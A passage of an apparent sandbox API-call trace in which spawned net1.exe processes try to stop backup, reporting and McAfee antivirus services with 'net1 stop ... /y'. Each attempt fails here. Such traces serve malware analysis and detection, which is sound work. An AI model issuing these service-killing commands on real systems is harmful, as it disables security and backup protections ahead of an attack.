_wcsicmp (_String1="server", _String2="PDVFSService") returned 3 [0125.959] _wcsicmp (_String1="svr", _String2="PDVFSService") returned 3 [0125.959] _wcsicmp (_String1="srv", _String2="PDVFSService") returned 3 [0125.959] _wcsicmp (_String1="lanmanserver", _String2="PDVFSService") returned -4 [0125.959] _wcsicmp (_String1="alerter", _String2="PDVFSService") returned -15 [0125.959] _wcsicmp (_String1="netlogon", _String2="PDVFSService") returned -2 [0125.959] _wcsupr (in: _String="PDVFSService" | out: _String="PDVFSSERVICE") returned="PDVFSSERVICE" [0125.959] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4454b0 [0126.580] GetServiceKeyNameW (in: hSCManager=0x4454b0, lpDisplayName="PDVFSSERVICE", lpServiceName=0xe5aaf0, lpcchBuffer=0x10fa08 | out: lpServiceName="", lpcchBuffer=0x10fa08) returned 0 [0126.581] _wcsicmp (_String1="msg", _String2="PDVFSSERVICE") returned -3 [0126.581] _wcsicmp (_String1="messenger", _String2="PDVFSSERVICE") returned -3 [0126.581] _wcsicmp (_String1="receiver", _String2="PDVFSSERVICE") returned 2 [0126.581] _wcsicmp (_String1="rcv", _String2="PDVFSSERVICE") returned 2 [0126.581] _wcsicmp (_String1="redirector", _String2="PDVFSSERVICE") returned 2 [0126.581] _wcsicmp (_String1="redir", _String2="PDVFSSERVICE") returned 2 [0126.581] _wcsicmp (_String1="rdr", _String2="PDVFSSERVICE") returned 2 [0126.581] _wcsicmp (_String1="workstation", _String2="PDVFSSERVICE") returned 7 [0126.581] _wcsicmp (_String1="work", _String2="PDVFSSERVICE") returned 7 [0126.581] _wcsicmp (_String1="wksta", _String2="PDVFSSERVICE") returned 7 [0126.581] _wcsicmp (_String1="prdr", _String2="PDVFSSERVICE") returned 14 [0126.581] _wcsicmp (_String1="devrdr", _String2="PDVFSSERVICE") returned -12 [0126.581] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSSERVICE") returned -4 [0126.581] _wcsicmp (_String1="server", _String2="PDVFSSERVICE") returned 3 [0126.581] _wcsicmp (_String1="svr", _String2="PDVFSSERVICE") returned 3 [0126.581] _wcsicmp (_String1="srv", _String2="PDVFSSERVICE") returned 3 [0126.581] _wcsicmp (_String1="lanmanserver", _String2="PDVFSSERVICE") returned -4 [0126.581] _wcsicmp (_String1="alerter", _String2="PDVFSSERVICE") returned -15 [0126.581] _wcsicmp (_String1="netlogon", _String2="PDVFSSERVICE") returned -2 [0126.581] NetServiceControl (in: servername=0x0, service="PDVFSSERVICE", opcode=0x0, arg=0x0, bufptr=0x10fa04 | out: bufptr=0x10fa04) returned 0x889 [0126.583] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.583] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.583] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.584] GetFileType (hFile=0x0) returned 0x0 [0126.584] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x443ed0 [0126.584] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x443ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.585] WriteFile (in: hFile=0x0, lpBuffer=0x443ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10f944, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f944, lpOverlapped=0x0) returned 0 [0126.585] LocalFree (hMem=0x443ed0) returned 0x0 [0126.585] GetFileType (hFile=0x0) returned 0x0 [0126.585] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x446178 [0126.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x446178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0126.585] WriteFile (in: hFile=0x0, lpBuffer=0x446178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f944, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f944, lpOverlapped=0x0) returned 0 [0126.585] LocalFree (hMem=0x446178) returned 0x0 [0126.585] _ultow (in: _Dest=0x889, _Radix=1112436 | out: _Dest=0x889) returned="2185" [0126.585] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.585] GetFileType (hFile=0x0) returned 0x0 [0126.585] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x446178 [0126.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x446178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.585] WriteFile (in: hFile=0x0, lpBuffer=0x446178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10f950, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f950, lpOverlapped=0x0) returned 0 [0126.585] LocalFree (hMem=0x446178) returned 0x0 [0126.585] GetFileType (hFile=0x0) returned 0x0 [0126.585] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x446178 [0126.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x446178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0126.585] WriteFile (in: hFile=0x0, lpBuffer=0x446178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f950, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f950, lpOverlapped=0x0) returned 0 [0126.585] LocalFree (hMem=0x446178) returned 0x0 [0126.586] NetApiBufferFree (Buffer=0x441ae8) returned 0x0 [0126.586] NetApiBufferFree (Buffer=0x441b00) returned 0x0 [0126.586] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0126.586] exit (_Code=2) Process: id = "289" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5a519000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "154" os_parent_pid = "0x1034" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 696 os_tid = 0x111c [0125.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fc34 | out: lpSystemTimeAsFileTime=0x35fc34*(dwLowDateTime=0x1ed5e630, dwHighDateTime=0x1d6f0d1)) [0125.983] GetCurrentProcessId () returned 0xb34 [0125.983] GetCurrentThreadId () returned 0x111c [0125.983] GetTickCount () returned 0x1152bd2 [0125.983] QueryPerformanceCounter (in: lpPerformanceCount=0x35fc2c | out: lpPerformanceCount=0x35fc2c*=24508401029) returned 1 [0125.983] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.983] __set_app_type (_Type=0x1) [0125.983] __p__fmode () returned 0x770331f4 [0125.984] __p__commode () returned 0x770331fc [0125.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.984] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.984] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.984] GetConsoleOutputCP () returned 0x1b5 [0125.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.988] sprintf_s (in: _DstBuf=0x35fbec, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.988] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.990] GetStdHandle (nStdHandle=0xfffffff5) returned 0x47c [0125.990] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.990] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0125.990] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35f9b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.990] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x82) returned 0x424ad0 [0125.990] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.990] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fbbc | out: Buffer=0x35fbbc*=0x421b08) returned 0x0 [0125.990] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fbbc | out: Buffer=0x35fbbc*=0x421b20) returned 0x0 [0125.990] _fileno (_File=0x77032900) returned -2 [0125.990] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.990] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.990] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.990] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.990] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.990] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.990] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.990] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.990] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.990] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.991] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.991] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.991] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.991] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.991] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.991] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.991] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.991] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.991] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.991] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.991] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.991] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.991] _wcsicmp (_String1="accounts", _String2="ReportServer$SYSTEM_BGC") returned -17 [0125.991] _wcsicmp (_String1="computer", _String2="ReportServer$SYSTEM_BGC") returned -15 [0125.991] _wcsicmp (_String1="config", _String2="ReportServer$SYSTEM_BGC") returned -15 [0125.991] _wcsicmp (_String1="continue", _String2="ReportServer$SYSTEM_BGC") returned -15 [0125.991] _wcsicmp (_String1="cont", _String2="ReportServer$SYSTEM_BGC") returned -15 [0125.991] _wcsicmp (_String1="file", _String2="ReportServer$SYSTEM_BGC") returned -12 [0125.991] _wcsicmp (_String1="files", _String2="ReportServer$SYSTEM_BGC") returned -12 [0125.991] _wcsicmp (_String1="group", _String2="ReportServer$SYSTEM_BGC") returned -11 [0125.991] _wcsicmp (_String1="groups", _String2="ReportServer$SYSTEM_BGC") returned -11 [0125.991] _wcsicmp (_String1="help", _String2="ReportServer$SYSTEM_BGC") returned -10 [0125.991] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SYSTEM_BGC") returned -10 [0125.991] _wcsicmp (_String1="localgroup", _String2="ReportServer$SYSTEM_BGC") returned -6 [0125.991] _wcsicmp (_String1="pause", _String2="ReportServer$SYSTEM_BGC") returned -2 [0125.991] _wcsicmp (_String1="session", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="sessions", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="sess", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="share", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="start", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="stats", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="statistics", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="stop", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.991] _wcsicmp (_String1="time", _String2="ReportServer$SYSTEM_BGC") returned 2 [0125.991] _wcsicmp (_String1="user", _String2="ReportServer$SYSTEM_BGC") returned 3 [0125.991] _wcsicmp (_String1="users", _String2="ReportServer$SYSTEM_BGC") returned 3 [0125.991] _wcsicmp (_String1="msg", _String2="ReportServer$SYSTEM_BGC") returned -5 [0125.992] _wcsicmp (_String1="messenger", _String2="ReportServer$SYSTEM_BGC") returned -5 [0125.992] _wcsicmp (_String1="receiver", _String2="ReportServer$SYSTEM_BGC") returned -13 [0125.992] _wcsicmp (_String1="rcv", _String2="ReportServer$SYSTEM_BGC") returned -2 [0125.992] _wcsicmp (_String1="netpopup", _String2="ReportServer$SYSTEM_BGC") returned -4 [0125.992] _wcsicmp (_String1="redirector", _String2="ReportServer$SYSTEM_BGC") returned -12 [0125.992] _wcsicmp (_String1="redir", _String2="ReportServer$SYSTEM_BGC") returned -12 [0125.992] _wcsicmp (_String1="rdr", _String2="ReportServer$SYSTEM_BGC") returned -1 [0125.992] _wcsicmp (_String1="workstation", _String2="ReportServer$SYSTEM_BGC") returned 5 [0125.992] _wcsicmp (_String1="work", _String2="ReportServer$SYSTEM_BGC") returned 5 [0125.992] _wcsicmp (_String1="wksta", _String2="ReportServer$SYSTEM_BGC") returned 5 [0125.992] _wcsicmp (_String1="prdr", _String2="ReportServer$SYSTEM_BGC") returned -2 [0125.992] _wcsicmp (_String1="devrdr", _String2="ReportServer$SYSTEM_BGC") returned -14 [0125.992] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SYSTEM_BGC") returned -6 [0125.992] _wcsicmp (_String1="server", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.992] _wcsicmp (_String1="svr", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.992] _wcsicmp (_String1="srv", _String2="ReportServer$SYSTEM_BGC") returned 1 [0125.992] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SYSTEM_BGC") returned -6 [0125.992] _wcsicmp (_String1="alerter", _String2="ReportServer$SYSTEM_BGC") returned -17 [0125.992] _wcsicmp (_String1="netlogon", _String2="ReportServer$SYSTEM_BGC") returned -4 [0125.992] _wcsupr (in: _String="ReportServer$SYSTEM_BGC" | out: _String="REPORTSERVER$SYSTEM_BGC") returned="REPORTSERVER$SYSTEM_BGC" [0125.992] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4254b8 [0126.588] GetServiceKeyNameW (in: hSCManager=0x4254b8, lpDisplayName="REPORTSERVER$SYSTEM_BGC", lpServiceName=0xe5aaf0, lpcchBuffer=0x35fb58 | out: lpServiceName="", lpcchBuffer=0x35fb58) returned 0 [0126.589] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0126.589] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0126.589] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SYSTEM_BGC") returned -13 [0126.589] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0126.589] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0126.589] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0126.589] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -1 [0126.589] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0126.589] _wcsicmp (_String1="work", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0126.589] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0126.589] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0126.589] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -14 [0126.589] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0126.589] _wcsicmp (_String1="server", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0126.589] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0126.589] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0126.589] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0126.589] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SYSTEM_BGC") returned -17 [0126.589] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SYSTEM_BGC") returned -4 [0126.589] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x35fb54 | out: bufptr=0x35fb54) returned 0x889 [0126.591] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.591] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.591] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.593] GetFileType (hFile=0x0) returned 0x0 [0126.593] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x423b40 [0126.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x423b40, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.593] WriteFile (in: hFile=0x0, lpBuffer=0x423b40, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fa94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa94, lpOverlapped=0x0) returned 0 [0126.593] LocalFree (hMem=0x423b40) returned 0x0 [0126.593] GetFileType (hFile=0x0) returned 0x0 [0126.593] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426170 [0126.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0126.593] WriteFile (in: hFile=0x0, lpBuffer=0x426170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fa94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa94, lpOverlapped=0x0) returned 0 [0126.593] LocalFree (hMem=0x426170) returned 0x0 [0126.593] _ultow (in: _Dest=0x889, _Radix=3537604 | out: _Dest=0x889) returned="2185" [0126.593] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.593] GetFileType (hFile=0x0) returned 0x0 [0126.593] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x426170 [0126.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x426170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.593] WriteFile (in: hFile=0x0, lpBuffer=0x426170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35faa0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35faa0, lpOverlapped=0x0) returned 0 [0126.593] LocalFree (hMem=0x426170) returned 0x0 [0126.593] GetFileType (hFile=0x0) returned 0x0 [0126.593] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426170 [0126.594] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0126.594] WriteFile (in: hFile=0x0, lpBuffer=0x426170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35faa0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35faa0, lpOverlapped=0x0) returned 0 [0126.594] LocalFree (hMem=0x426170) returned 0x0 [0126.594] NetApiBufferFree (Buffer=0x421b08) returned 0x0 [0126.594] NetApiBufferFree (Buffer=0x421b20) returned 0x0 [0126.594] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0126.594] exit (_Code=2) Process: id = "290" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4d67b000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "138" os_parent_pid = "0x38c" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 697 os_tid = 0xb74 [0126.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fd4c | out: lpSystemTimeAsFileTime=0x10fd4c*(dwLowDateTime=0x1edaa8f0, dwHighDateTime=0x1d6f0d1)) [0126.017] GetCurrentProcessId () returned 0xb70 [0126.017] GetCurrentThreadId () returned 0xb74 [0126.017] GetTickCount () returned 0x1152bf1 [0126.017] QueryPerformanceCounter (in: lpPerformanceCount=0x10fd44 | out: lpPerformanceCount=0x10fd44*=24511993799) returned 1 [0126.019] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.019] __set_app_type (_Type=0x1) [0126.019] __p__fmode () returned 0x770331f4 [0126.019] __p__commode () returned 0x770331fc [0126.020] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.020] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.020] GetConsoleOutputCP () returned 0x1b5 [0126.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.023] sprintf_s (in: _DstBuf=0x10fd04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.023] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.026] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.026] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0126.026] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10fad0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.026] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x7a) returned 0x343af0 [0126.026] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.026] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fcd4 | out: Buffer=0x10fcd4*=0x341af8) returned 0x0 [0126.026] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fcd4 | out: Buffer=0x10fcd4*=0x341b10) returned 0x0 [0126.026] _fileno (_File=0x77032900) returned -2 [0126.026] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.027] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.027] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.027] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.027] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.027] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.027] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.027] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.027] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.027] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.027] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.027] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.027] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.027] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.027] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.027] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.027] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.027] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.027] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.027] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.027] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.027] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.027] _wcsicmp (_String1="accounts", _String2="McAfeeEngineService") returned -12 [0126.027] _wcsicmp (_String1="computer", _String2="McAfeeEngineService") returned -10 [0126.027] _wcsicmp (_String1="config", _String2="McAfeeEngineService") returned -10 [0126.027] _wcsicmp (_String1="continue", _String2="McAfeeEngineService") returned -10 [0126.027] _wcsicmp (_String1="cont", _String2="McAfeeEngineService") returned -10 [0126.027] _wcsicmp (_String1="file", _String2="McAfeeEngineService") returned -7 [0126.027] _wcsicmp (_String1="files", _String2="McAfeeEngineService") returned -7 [0126.027] _wcsicmp (_String1="group", _String2="McAfeeEngineService") returned -6 [0126.027] _wcsicmp (_String1="groups", _String2="McAfeeEngineService") returned -6 [0126.027] _wcsicmp (_String1="help", _String2="McAfeeEngineService") returned -5 [0126.027] _wcsicmp (_String1="helpmsg", _String2="McAfeeEngineService") returned -5 [0126.027] _wcsicmp (_String1="localgroup", _String2="McAfeeEngineService") returned -1 [0126.027] _wcsicmp (_String1="pause", _String2="McAfeeEngineService") returned 3 [0126.027] _wcsicmp (_String1="session", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="sessions", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="sess", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="share", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="start", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="stats", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="statistics", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="stop", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="time", 